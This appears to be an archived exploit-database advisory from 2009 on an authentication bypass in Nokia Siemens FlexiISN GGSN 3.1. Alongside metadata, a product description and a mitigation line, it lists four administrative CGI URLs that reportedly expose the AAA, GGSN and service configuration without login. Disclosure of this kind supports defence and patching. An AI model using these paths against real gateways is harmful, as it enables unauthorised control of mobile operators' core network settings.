NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability

vendor:

FlexiISN GGSN FISN 3.1

by:

TaMbaRuS (tambarus@gmail.com)

6.4

CVSS

CRITICAL

Input Validation Error

CWE

Product Name: FlexiISN GGSN FISN 3.1

Affected Version From: FlexiISN (GGSN) FISN 3.1

Affected Version To: FlexiISN (GGSN) FISN 3.1

Patch Exists: YES

Related CWE: N/A

CPE: h:nokiasiemensnetworks:flexi_isn_ggsn_fisn_3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: FlexiISN (GGSN) FISN 3.1

2009

NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability

The Flexi ISN, which performs GPRS Gateway Service Node (GGSN) and data charging functionalities, is fully integrated with the existing Nokia Siemens Networks charge@once prepaid solution to enable flexible charging of data services. The systems integration services ensure seamless consumer experience, while managing an increasingly complex combination of new processes and systems. With the introduction of Flexi ISN, mobile telekom service provider is able to combine all in one box a GGSN and an Intelligent Charging Node. The deployed Flexi ISN 3.1 system is able, through deep packet inspection, to distinguish the type of traffic such as HTTP browsing, WAP browsing, MMS, streaming, content download thus enabling different charging models based on the type of data service used.

Mitigation:

Ensure that authentication is enabled for all URLs and that only authorized users are allowed access.

Source

Exploit-DB raw data:

NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability: NOKIA Siemens FlexiISN

Remote:  Yes  

Local:  No 

Class: Input Validation Error 

Critical: Moderately critical  

OS : FlexiISN (GGSN) FISN 3.1

URL 1 for bypassing authentication on AAA Configuration: http://[Flexi-ISN IP]/cgi-bin/aaa.tcl?

URL 2 for bypassing authentication on Aggregation Class Configuration : http://[Flexi-ISN IP]/cgi-bin/aggr_config.tcl?

URL 3 for bypassing authentication on GGSN general Configuration : http://[Flexi-ISN IP]/opt/cgi-bin/ggsn/cgi.tcl?page=ggsnconf

URL 4 for bypassing authentication on Network Access & services : http://[Flexi-ISN IP]/opt/cgi-bin/services.tcl?instance=default

Published: March 30, 2009

Discovered by: TaMbaRuS (tambarus@gmail.com)

Site: www.nokiasiemensnetworks.com

Greetz: Mr. Gabriel Waller from NSN for all his support for researching on the vulnerabilities.

Description:

The Flexi ISN, which performs GPRS Gateway Service Node (GGSN) and data charging functionalities, 
is fully integrated with the existing Nokia Siemens Networks charge@once prepaid solution to enable 
flexible charging of data services. The systems integration services ensure seamless consumer experience, 
while managing an increasingly complex combination of new processes and systems.

With the introduction of Flexi ISN, mobile telekom service provider is able to combine all in one box a 
GGSN and an Intelligent Charging Node. The deployed Flexi ISN 3.1 system is able, through deep packet 
inspection, to distinguish the type of traffic such as HTTP browsing, WAP browsing, MMS, streaming, 
content download thus enabling different charging models based on the type of data service used.

# milw0rm.com [2009-03-30]